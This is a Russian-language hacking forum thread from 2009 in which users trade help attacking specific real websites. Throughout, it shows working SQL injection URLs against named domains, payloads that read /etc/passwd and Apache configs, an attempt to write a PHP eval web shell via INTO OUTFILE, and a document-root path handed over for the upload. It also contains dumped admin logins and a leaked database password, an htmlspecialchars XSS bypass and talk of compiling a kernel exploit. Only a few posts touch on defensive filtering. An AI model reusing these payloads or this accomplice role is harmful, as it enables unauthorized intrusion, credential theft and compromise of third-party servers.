12.11.2009, 21:20
Фильтруй передаваемые данные.
Могу порекомендовать функцию htmlspecialchars() превращающую HTML теги в HTML сущности. От нее отталкивайся.

Не самый лучший выбор, особенно если фильтруемое значение потом размещается где-нибудь в виде ссылки, например на форуме vbulletin

vorona
12.11.2009, 21:22
vorona фильтровать данные !

если на PHP пишем то strip_tags,htmlspecialchar,htmlentites кажеться вот так!
Смотри в мануале.
самого htmlspecialchar достаточно??

fng
12.11.2009, 21:22
Пытаюсь делать SQL-инъекцию на одном ресурсе, при подстановке кавычки ко всем параметрам, которые проверил выводятся ворнинги такого плана:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ...

Можно ли что-то сделать с этими параметрами?

Pashkela
12.11.2009, 21:25
fng:

может и можно, а может и нельзя - ссылку в студию, попробуй перечитай свой вопрос и осознай, что разговариваешь с Землянами, а не с гуманоидными существами из галактики бетта, которые в совершенстве познали телепатию

Ins3t
12.11.2009, 21:25
2Pashkela, могут конечно быть дефекты, но все зависит от того что и где ты фильтруешь.

P.S.: к стати, замечал на какой то из версий воблы используеться эта ф-я в ббкодах, действительно были дефекты. Но данная функция далеко не единственный способ защиты ;)

[underwater]
12.11.2009, 21:25
Сообщение от Ins3t
Фильтруй передаваемые данные.
Могу порекомендовать функцию htmlspecialchars() превращающую HTML теги в HTML сущности. От нее отталкивайся.
Обсуждалось уже, htmlspecialchars() тоже обходиться.

vorona
12.11.2009, 21:26
']Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о

L I G A
12.11.2009, 21:27
']Обсуждалось уже, htmlspecialchars() тоже обходиться.
show must go on

Aртем
12.11.2009, 21:27
Пытаюсь делать SQL-инъекцию на одном ресурсе, при подстановке кавычки ко всем параметрам, которые проверил выводятся ворнинги такого плана:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in ...

Можно ли что-то сделать с этими параметрами?
Как ты пытаешься провести инъект, если ты даже не знаешь что он тебе отвечает?

order by 10000 --
order by 1 --
order by 4 --

union select 1,2,3,4 --

выводит 2,4 например

union select 1,concat_ws(0x3a,version(),user()),3,4 --

Ins3t
12.11.2009, 21:28
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.

Но этот вопрос, ИМХО, не сюда нужно адавать, а в кодинг.

jecka3000
12.11.2009, 21:29
http://security-digger.org/

или мой сканер директорий. https://hashcracking.info/forum/viewtopic.php?f=17&t=392
ну вот просканировал я директори, получилось вот что:
Found [403]: mtl-consultants.com/.htaccess
Found [403]:site.com/.htaccess~
Found [403]: site.com/.htpasswd
Found [403]: site.com/.htpasswd~
Found [200]: .com/_notes/
Found [403]: .com/cgi-bin/
Found [403]: .com/cgi-sys/
Found [301]: .com/cpanel/
Found [200]: .com/email/
Found [301]: .com/images
Found [403]: .com/mailman
Found [301]: .com/pipermail
Found [301]: .com/webmail
Found [403]: .com/~root

а что дальше? объясни плиз

Aртем
12.11.2009, 21:31
По одиночку все обходится, но в сумме с еще несколькими ф-ями + регулярками получится неплохой фильтр, естественно если понимать что к чему.
А если например не изобретать непонятный велосипед, который возможно рухнет под интеллектуальным натиском, заюзать например пхп-класс который фильтрует всё и вся - PHP Input Filter

vorona
12.11.2009, 21:31
как обходится htmlspecialchars??

fng
12.11.2009, 21:33
n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать

Pashkela
12.11.2009, 21:37
Сообщение от [underwater]
Обсуждалось уже, htmlspecialchars() тоже обходиться.
как? О_о

1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:


<?php
$a = "javascript:document.write('<script>alert(0)</script>');";
$data = htmlspecialchars($a);
echo "<a href=$data>Tikni</a>";
?>


просто запустите и удивитесь сильно

PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте

L I G A
12.11.2009, 21:37
unu']Ну как бэ от ордер бай не всегда польза есть, часто приходится в ручную все гонять:(
ну как бэ если на то пошло,то лучше будет для начала версию пробить,т.е. если 4.0 мускул union не катит
+and+substring(version(),1,1)=4

LzD
12.11.2009, 21:38
n-sider.com
вот этот ресурс...

статьи я читал, но по этой ошибке не нашел инфы к сожалению
количество полей не получилось подобрать
http://www.n-sider.com/gameview.php?gameid=46+AND+1=2+UNION+SELECT+1,2--
[+] Current Database : nsider
[+] Database User : nsider_mysql@apache2-fungi.pistons.dreamhost.com
[+] MySQL Version : 5.0.67-userstats-log

Ins3t
12.11.2009, 21:39
2fng,


http://www.n-sider.com/gameview.php?gameid=-6399'+union+select+1,2,version(),4,5--+&view=screens

вывод в свойставх картинки

fng
12.11.2009, 21:45
спасибо парни, вроде так же делал, не заметил может вывод...

vorona
12.11.2009, 21:48
1. UTF-7
2. Если значение после обработки htmlspecialchars попадает в ссылку, например "URL домашней странички", что с успехом подтверждает следующий код:


<?php
$a = "javascript://%0adocument.write('<script>alert(0)</script>');";
$data = htmlspecialchars($a);
echo "<a href=$data>Tikni</a>";
?>


просто запустите и удивитесь сильно

PS: Посмотрите исходники странички перед тем, как тыкнуть, и ваще опупейте
Я в шоке!!! А что делать??

Pashkela
12.11.2009, 21:54
Я в шоке!!! А что делать??

Как бы ужасно это не звучало, но htmlentities приведет к тому же результату :)

А вот strip_tags решит проблему

PS: Надеюсь многолетние ламерские споры на этом закончатся

vorona
12.11.2009, 21:59
Как бы ужасно это не звучало, но htmlentities приведет к тому же результату :)

А вот strip_tags решит проблему

PS: Надеюсь многолетние ламерские споры на этом закончатся
strip_tags поможет в случае с выводом в ссылку или с утф-7??

Pashkela
12.11.2009, 22:01
strip_tags поможет в случае с выводом в ссылку или с утф-7??

UTF-7 сработает только если в браузере стоит автоопределение кодировки, да и то, если браузер поддерживает UTF-7 кодировку вообще. Не очень актуально для современных браузеров

Ins3t
12.11.2009, 22:07
Он хочет например через str_replace() заменять в передаваемых гетом/постом запросах латинские буквы на русские, чтобы если ты передаешь гетом или постом что то типа "...script" оно менялось на русские буквы и не пахало.
Это не самый лутший вариант.

Но хочу повторить: здесь раздел для обсуждения УЯЗВИМОСТЕЙ, по поводу защиты пиши в кодинг.

fng
12.11.2009, 22:18
Посмотрите еще вот это плиз


www.bulletinpa.com/index.php?id=700%27
вот такая ошибка
Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

www.bulletinpa.com/index.php?id=700 and 1=0
резульатат тот же что и:
www.bulletinpa.com/index.php?id=700

почему так происходит?

[x60]unu
12.11.2009, 22:23
Посмотрите еще вот это плиз


www.bulletinpa.com/index.php?id=700%27
вот такая ошибка
Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

www.bulletinpa.com/index.php?id=700 and 1=0
резульатат тот же что и:
www.bulletinpa.com/index.php?id=700

почему так происходит?


http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
версия видна ('5.0.32-Debian_7etch1-log')
2. МБ фильтрация (Т.К вроде идет Blind sql)

L I G A
12.11.2009, 22:39
unu']http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
версия видна ('5.0.32-Debian_7etch1-log')
2. МБ фильтрация (Т.К вроде идет Blind sql)
гуд,вот только /**/and/**/1=1/* - тут незачем
ПС слепая там

[x60]unu
12.11.2009, 22:41
гуд,вот только /**/and/**/1=1/* - тут незачем

Да /**/and/**/1=1/* разве что для обхода фильтрации, но мне так удобнее выходит ;)

FlaktW
12.11.2009, 23:56
Помогите найти админку, сканером не получается.


http://www.lechaim.co.za

jecka3000
13.11.2009, 00:31
люди, вот за сегодня сайтов 5 раскрутил до вида логин;пасс и нашел админки. Но ни одна пара логина и пароля не подошла и с такой проблемой я сталкиваюсь ооочень часто.
П.С. Пары,уверен, с админскими правами

jecka3000
13.11.2009, 00:41
А ты пассы расшифровывал?)

П.С. А откуда такая уверенность?
ну как бэ я думаю, что у обычного юзера логин admin не будет)

Kadness
13.11.2009, 00:54
Чото не получается с XSS видно защита какаято или хз((( Есть еще варианты получить пасс админа??(кроме брута)

[x60]unu
13.11.2009, 01:02
php injection (шелл) sql injection (пассы юзеров, может быть что и админа) брут сайтов + приват прокси + хороший пасс лист ( и мон кучу юзеров сбрутить)

Kadness
13.11.2009, 01:31
Из всего этого я знаю только брут)))

[x60]unu
13.11.2009, 01:39
php injection - http://forum.antichat.ru/thread12123.html
sql injection - http://forum.antichat.ru/thread43966.html
неужели трудно было самому найти

fng
13.11.2009, 03:17
[x60]unu, выручай

никак не могу разобрать твой хитрый запрос....
http://www.bulletinpa.com/index.php?id=700/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN%20(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/1=1/*
почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

сижу вот голову ломаю, никак не разобрался =(

Iceangel_
13.11.2009, 03:21
[x60]unu, выручай

никак не могу разобрать твой хитрый запрос....

почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

сижу вот голову ломаю, никак не разобрался =(
Вот ответ на твой вопрос:
http://forum.antichat.ru/threadnav119047-2-10.html

[x60]unu
13.11.2009, 03:23
[x60]unu, выручай

никак не могу разобрать твой хитрый запрос....

почему именно столько вложенных запросов, для чего Join и что именно делает функция NAME_CONST....

сижу вот голову ломаю, никак не разобрался =(

NAME_CONST - http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html#function_name-const

totem
13.11.2009, 03:46
как скомпилить сплойт, написанный на Си компилятором g++ ?


$ g++ -fno-stack-protector -o exp exploit.c
exploit.c: In function 'void extract_and_play_video()':
exploit.c:78: error: expected unqualified-id before 'template'
exploit.c:85: error: invalid conversion from 'void*' to 'char*'
exploit.c:94: error: expected primary-expression before 'template'
exploit.c:100: error: expected primary-expression before 'template'
exploit.c:102: error: expected primary-expression before 'template'
exploit.c: In function 'int own_the_kernel(long unsigned int, long unsigned int, long unsigned int, long unsigned int, long unsigned int)':
exploit.c:321: error: invalid conversion from 'unsigned int*' to 'int*'
exploit.c: In function 'int pa__init(void*)':
exploit.c:354: error: invalid conversion from 'void*' to 'char*'
exploit.c:358: error: invalid conversion from 'void*' to 'char*'
exploit.c:395: error: expected unqualified-id before 'template'
exploit.c:399: error: expected primary-expression before 'template'
exploit.c:404: error: expected primary-expression before 'template'

razb
13.11.2009, 12:42
2totem

$ gcc -fno-stack-protector -o exp exploit.c

M1ks
13.11.2009, 15:24
нашел вроде как инъекцию в поиске, но результат вылетел какойто запутанный:

Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `db_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/.../req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.dis play=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/.../req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/..../req/db/drivers/mysql/MySqlConnection.class.php on line 176
как в данном случае можно подставить запрос?

[x60]unu
13.11.2009, 15:41
M1Ks продолжаем тему... ребята вообще тут идет такая лажа как на video.antichat.ru
когда в поле поиск вбивали кавычку и оно выдавало ошибку (все идет из-за бажного поисковика) может есть какие то способы крутить такие скули
http://rcc-penza.ru/advanced_search/
импульс на ковычку
Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE (`name` LIKE '%'%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR `code` LIKE '%'%') AND `is_group` != 1 AND (`is_hide` IS NULL OR `is_hide`' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.dis play=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php(32): in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176
импульс на XSS ( "><script>alert('XSS');</script> )
Fatal error: Uncaught <div style="font-family: tahoma, arial; font-size: 14px; line-height: 1.5em; "><b style="color: #f00; font-size: 14px; ">Database Query Exception</b><br/><b>Message</b>: SELECT * FROM `rcc_product` WHERE `name` LIKE '%"><script>alert('XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AND `quantity` > 0 ORDER BY pid, name. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'XSS');</script>%' AND `is_group` = 1 AND (`is_hide` IS NULL OR `is_hide` = 0) AN' at line 1<br/><b>File</b>: /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php <b>Line</b>: 176 <br/><a href="javascript:void(0);" onclick="javascript:var st=document.getElementById('stBlock');st.style.dis play=(st.style.display=='none')?'block':'none';">Stack trace</a><div id="stBlock" style="display: none; margin: 0; ">0 /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.p in /var/www/rcc-penza/data/www/rcc-penza.ru/req/db/drivers/mysql/MySqlConnection.class.php on line 176

RulleR
13.11.2009, 16:05
2 [x60]unu
раскручиваем как blind по методу Qwazar'a [подробнее (https://forum.antichat.ru/showpost.php?p=1494443&postcount=11) ]
xek%'/**/union/**/select/**/*/**/from/**/(select/**/*/**/from/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1),name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),1))a)b/*
и видим 1ю таблу : CHARACTER_SETS

dr.Pilulkin
13.11.2009, 18:53
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.

Попробуй вместо пробела $IFS

apekoff
13.11.2009, 18:55
Привет
вот вроде как уязвимость

http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd') from+mysql.user--+
проверка на заливку
http://www.spacefoundation.org/news/story.php?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'<?php eval($_GET[‘e’]) ?>' from+mysql.user INTO OUTFILE '/tmp/aaaaaaaaa11231.php'--+ -все записывается в папку /tmp/ , так же если захожу в /etc/passwd отображается список админов + вроде абсолютные пути к сайтам ..,но !или нет прав записи или же абсолютный путь не правильный - это если заливать по пути который указан для админа по /home/virtual/site3/fst/home/spacefoundation в /etc/passwd:(
И еще когда читаю файл из tmp то запись там вида -
1,2,3,4,5,6,7,8,9,10+<?php eval($_GET[‘e’]) ?> находится в сорсе ,...+ проверял на ошибки чтоб выдавал путь - без толку. в кеше гугла ошибок нет..
проверял на наличие стандартных папок по этим шаблонам - http://forum.antichat.ru/threadnav30632-1-10.html -тоже ничего не обнаружил ...очень конечно привлекло внимание расписанный /etc/passwd .. Есть мысли ?

Ins3t
13.11.2009, 19:19
2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.

OS: RedHat:

http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+

DocumentRoot "/var/www/html

Krist_ALL
13.11.2009, 19:23
Сообщение от icekvot
Подскажите. Могу читать файлы и листинг файлов в папке через cgi
Папку "?lang=../../../../WINDOWS/" выводит нормально. А вот в "?lang=../../../../Documents and Settings/" не получается. Походу из-за пробелов.Как бы это обойти. Прочтовал пробел заменить на 0x20 непомогло. Также попробовал всю строку представить в других кодировках (url, sql, char) непомогает.

?lang=../../../../Documents+and+Settings/

apekoff
13.11.2009, 19:28
нашел ... а в какой строчке искать сие чудо ? ну или хотя бы куда смотреть ... или выложить целиком этот файл сюда ?ага извеняюсь , не заметил что поправил сообщение ..

Spyder
13.11.2009, 19:36
apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra
Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними

Ins3t
13.11.2009, 19:39
apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra
Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними

DocumentRoot, без нижней черты.

# DocumentRoot "/var/www/html"

# DocumentRoot /www/docs/dummy-host.example.com

Это из httpd.conf

apekoff
13.11.2009, 19:40
[QUOTE=Ins3t]2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.

OS: RedHat:

http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+

DocumentRoot "/var/www/html
не заливается ни в DocumentRoot "/var/www/htmlни в "/var/www/html/home/virtual/site3/fst/home/spacefoundation/111.php

Spyder
13.11.2009, 19:41
в DocumentRoot обычно путь до дефолных файлов апача, где index.html c текстом It's work
Как правило реальные пути до сайтов, особенно если это хостинг, находятся в вирутальных хостах

apekoff
13.11.2009, 19:44
что т я запутался ребята :(куда смотреть что писать :)

apekoff
13.11.2009, 19:46
кстати это не хостинг .. там просто все как то хитро ..это какая то организация космическая на ихнем сервере около 10 сайтов космической и научной тематики просто что это за пути в /etc/passwd
----------------
вот еще в самом низу -
# Include httpd20_app.conf
Include conf/httpd20_app.conf

Spyder
13.11.2009, 19:48
apekoff, смотри ниже в httpd.conf инклудится файл
Include conf/httpd20_app.conf
http://www.spacefoundation.org/news/story.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file%2 8%27/etc/httpd/conf/httpd20_app.conf%27%29%20from+mysql.user--+
тут инклудится
/etc/httpd/conf/virtual
Судя по всему это папка в которой находятся конфиги всех сайтов

http://www.spacefoundation.org/news/story.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file%2 8%27/etc/httpd/conf/virtual/site1%27%29%20from+mysql.user--+

Вот конфиг для первого сайта, перебирай имена site1,site2 ...

Spyder
13.11.2009, 19:50
Кстати это хостинг, вернее какая то контора которая предоставляет выделенные сервера, у меня есть шелл на сервере с абсолютно схожими расположениями конфигов, поэто му я сейчас посмотрел какие файлы в /etc/httpd/conf/virtual =)

apekoff
13.11.2009, 19:57
чет не могу я залить :(

Jokester
13.11.2009, 20:03
чет не могу я залить :(
И что, нужно залить и тебе дать? Всё уже тебе объяснили, просьбы о взломе запрещены

apekoff
13.11.2009, 20:04
И что, нужно залить и тебе дать? Всё уже тебе объяснили, просьбы о взломе запрещены
а что я разве просил ?я спрашивал ...

Pashkela
13.11.2009, 20:05
[QUOTE=Ins3t]2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.

OS: RedHat:

http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+

DocumentRoot "/var/www/html
не заливается ни в DocumentRoot "/var/www/htmlни в "/var/www/html/home/virtual/site3/fst/home/spacefoundation/111.php

изучай:


http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/var/log/httpd/access_log')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/var/log/httpd/error_log')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/passwd')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/my.cnf')--+
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/logrotate.d/proftpd')--+

apekoff
13.11.2009, 20:20
http://www.spacefoundation.org/news/story.php
?id=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,'text' from+mysql.user INTO OUTFILE '/home/virtual/site3/fst/var/www/html/111.php'--+
вот как получается правильный путь - но записи нету :(,почему?

l1ght
13.11.2009, 20:25
it's here
http://news.spacefoundation.org/mail/link.php?M=337004&N[]=563&L=67
/add например http://www.spacefoundation.org/research/TSR07.php?id=-420'+union+select+load_file('/home/virtual/site14/fst/var/www/html/mail/index.php')--+1

define('SENDSTUDIO_DATABASE_TYPE', 'mysql');
define('SENDSTUDIO_DATABASE_USER', 'webdev');
define('SENDSTUDIO_DATABASE_PASS', 'a50x35sf');
define('SENDSTUDIO_DATABASE_HOST', 'localhost');

gisTy
13.11.2009, 20:25
вот как получается правильный путь - но записи нету :(,почему?
может прав нету, не?
ищи папку, где будут права на запись, либо попробуй другим способом

apekoff
13.11.2009, 20:29
it's here
http://news.spacefoundation.org/mail/link.php?M=337004&N[]=563&L=67
получается путь пральный !
видимо нет прав на запись ...или я не даже не знаю .. идеи ?
Да

Закончить флудить и как уже сказали искать папку на запись
Да вы батенька - хам
Лайт можно тебя в ПМ, а то джокстер говорит что я флудер , а сам тупо 2 мессаги захирячил ниочем

Jokester
13.11.2009, 20:39
видимо нет прав на запись

Да
идеи ?
Закончить флудить и как уже сказали искать папку на запись

$n@ke
13.11.2009, 21:18
apekoff, на тебе диру под запись:
/home/virtual/site3/fst/var/www/html/docs/
гугл всемогущий...или брюс. Похрен впрочем. Лейся.

jecka3000
13.11.2009, 21:43
парни, вот уже наверное за 2 дня десятую скули раскрутил,нашел админку,но пассворд не подходит, вот пример:
http://www.kamal.dk/fokusligenu.php?id=-227+UNION+SELECT+1,2,3,concat(username,0x20,userpa ssword),5,6,7,8,9,10,11,12+from+users--
http://www.kamal.dk/admin

но опять ничего не подошло, посмотрите плиз)

wolmer
13.11.2009, 21:46
но опять ничего не подошло, посмотрите плиз)
Стоит basic авторизация (т.е. возможно одна пара логин/пароль вписанны в php файл для авторизации через basic (имхо многие так админы делают))

Возможно таблица юзеров от чего то другого

jecka3000
13.11.2009, 21:50
wolmer, я смотрю умные админы пошли) 10 сайтов, 10 разных стран...странно)

FlaktW
13.11.2009, 21:53
На этом сайте есть таблица user

http://www.pcci.org.za/default.asp?id=946

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'id = 946''.

/default.asp, line 128


http://www.pcci.org.za/default.asp?id=946+order+by+2
http://www.pcci.org.za/default.asp?id=946+union+select+1,2

http://www.pcci.org.za/default.asp?id=-946+union+select+*+from+msysobjects+in+'.'






Microsoft JET Database Engine error '80004005'

The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.

/default.asp, line 128




Но вывести нечего не удаеться.

Поскажите, как правилбно составить запрос.

ElteRUS
13.11.2009, 21:58
FlaktW,

http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6

id=-1+union+select+username,password+from+ADMINISTRATO RS

jecka3000
13.11.2009, 22:20
ElteRUS, смотри, www.pcci.org.za/admin - админка
есть три пары:
admin;admin
admi;admin
manager;manager
правильно?
Но опять же, в админку не попасть)

FlaktW
13.11.2009, 22:25
FlaktW,

http://www.pcci.org.za/default.asp?id=-1+union+select+null,name+from+msysobjects+where+MS ysObjects.Type=6

id=-1+union+select+username,password+from+ADMINISTRATO RS





Thanks, все получилось.

jecka3000
13.11.2009, 22:38
http://login.main.cne.gov.pr/login.php
есть следующие пары:
admin:Dyn@mic
webmaster:2624

Но опять же ни один не подошел! Мне кажется, что я что то не так делаю,т.к. не может не подходить пароли уже к больше чем к 10 сайтам!

fng
13.11.2009, 22:39
Возник такой вопрос. Можно с помощью SQL injection внедрить запросы типа INSERT и DELETE? Для MySQL.

Ins3t
13.11.2009, 22:55
Ну если есть инъекция в INSERT/DELETE запросе - то можно.

fng
13.11.2009, 23:03
а если в SELECT-е -- нет?

wolmer
13.11.2009, 23:04
Ну если есть инъекция в INSERT/DELETE запросе - то можно.
Пример внедрения в студию

Ins3t
13.11.2009, 23:14
Скуль в имени таблицы:

INSERT INTO [SQL] VALUES('site','lala','blabla','lolo','aaa');

INSERT INTO [mysql.user (user, host, password) VALUES ('new_user', PASSWORD('password')),a,b,c)/*] VALUES ('site', 'lala', 'blabla', 'lolo', 'aaa');

wolmer
13.11.2009, 23:19
Скуль в имени таблицы
А если mysql-inj будет в параметрах? (так то если mysql-inj в имени таблицы то это легко крутить)(именно интересует выход за таблицу и запись в другую какую либо таблицу (но скорее всего это не возможно :) ))

Aртем
13.11.2009, 23:25
Ну если есть инъекция в INSERT/DELETE запросе - то можно.
ты забыл добавить одно НО, если у пользователя из под которого работает скрипт ЕСТЬ ПРАВА НА ВЫПОЛНЕНИЕ операторов INSERT/UPDATE/DELETE.

Хотя да, я невнимательно прочитал твоё сообщение. Извиняюсь.

Scipio
13.11.2009, 23:38
например:
INSERT INTO users
SET id ={inj}

INSERT INTO users
SET id =1 ON duplicate KEY UPDATE pass = '12345'

поле id должно быть первичным ключем или просто уникальным

totem
14.11.2009, 01:18
как скомпилить сплойт, написанный на Си компилятором g++ ? К компилятору gcc доступа нет.


$ ls -la /usr/bin/gcc
-rwx------ 2 root root 202320 May 27 2008 /usr/bin/gcc
$ ls -la /usr/bin/g++
-rwxr-xr-x 2 root root 202320 May 27 2008 /usr/bin/g++




$ g++ -fno-stack-protector -o exp exploit.c
exploit.c: In function 'void extract_and_play_video()':
exploit.c:78: error: expected unqualified-id before 'template'
exploit.c:85: error: invalid conversion from 'void*' to 'char*'
exploit.c:94: error: expected primary-expression before 'template'
exploit.c:100: error: expected primary-expression before 'template'
exploit.c:102: error: expected primary-expression before 'template'
exploit.c: In function 'int own_the_kernel(long unsigned int, long unsigned int, long unsigned int, long unsigned int, long unsigned int)':
exploit.c:321: error: invalid conversion from 'unsigned int*' to 'int*'
exploit.c: In function 'int pa__init(void*)':
exploit.c:354: error: invalid conversion from 'void*' to 'char*'
exploit.c:358: error: invalid conversion from 'void*' to 'char*'
exploit.c:395: error: expected unqualified-id before 'template'
exploit.c:399: error: expected primary-expression before 'template'
exploit.c:404: error: expected primary-expression before 'template'

Ins3t
14.11.2009, 01:23
Как уже поведал мне товарисч razb, эрроры у тебя из за того, что template в языке С - это ключевое слово, а у тебя это переменная. Переименой ее.

ILYAtirtir
14.11.2009, 03:20
Там покруче есть)
http://www.whitehall.ru/producer.php?ID=phpinfo()

ILYAtirtir
14.11.2009, 04:03
Не получается потому что там 3я версия мускула,поэтому объеденить два select'а не выйдет. Хоть ты и не просил,вот в конфиге прочитал:
$admpasswd='Ultra';
$admlogin='admin';

ILYAtirtir
14.11.2009, 04:14
https://forum.antichat.ru/showpost.php?p=565034&postcount=4
[-_-]

dimonle
14.11.2009, 05:27
Люди сорри,наверняка возникала такая проблема,но все страницы долго читать)последнее время когда натыкаюсь на новые сайты со скулем хочу проверить их на иньекцию.при любом запросе вылетает белый лист с надписью hacking attempt!перевод то я понимаю,но вот никак понять не могу,можно ли я эту надпись как то обойти и дальше поковырять базу,или сразу понятно что даже если уязвимость есть,ею не воспользоваться?

m0Hze
14.11.2009, 05:37
Люди сорри,наверняка возникала такая проблема,но все страницы долго читать)последнее время когда натыкаюсь на новые сайты со скулем хочу проверить их на иньекцию.при любом запросе вылетает белый лист с надписью hacking attempt!перевод то я понимаю,но вот никак понять не могу,можно ли я эту надпись как то обойти и дальше поковырять базу,или сразу понятно что даже если уязвимость есть,ею не воспользоваться?
На разных сайтах это организовываеться по разному,своровали с DLE :(
Но в основном,просто либо

if(!intval(var)){
echo 'Hacking attempt!';
}

or

if(preg_match('#\'|union|select|...#isU',var)){
echo 'Hacking attempt!';
}

Ну или подобные варианты,на парсинг QUERY_STRING целиком.
Так что тут под каждй случай в отдельности нужно искать обход.
Или копать в другую сторону.

warlok
14.11.2009, 07:01
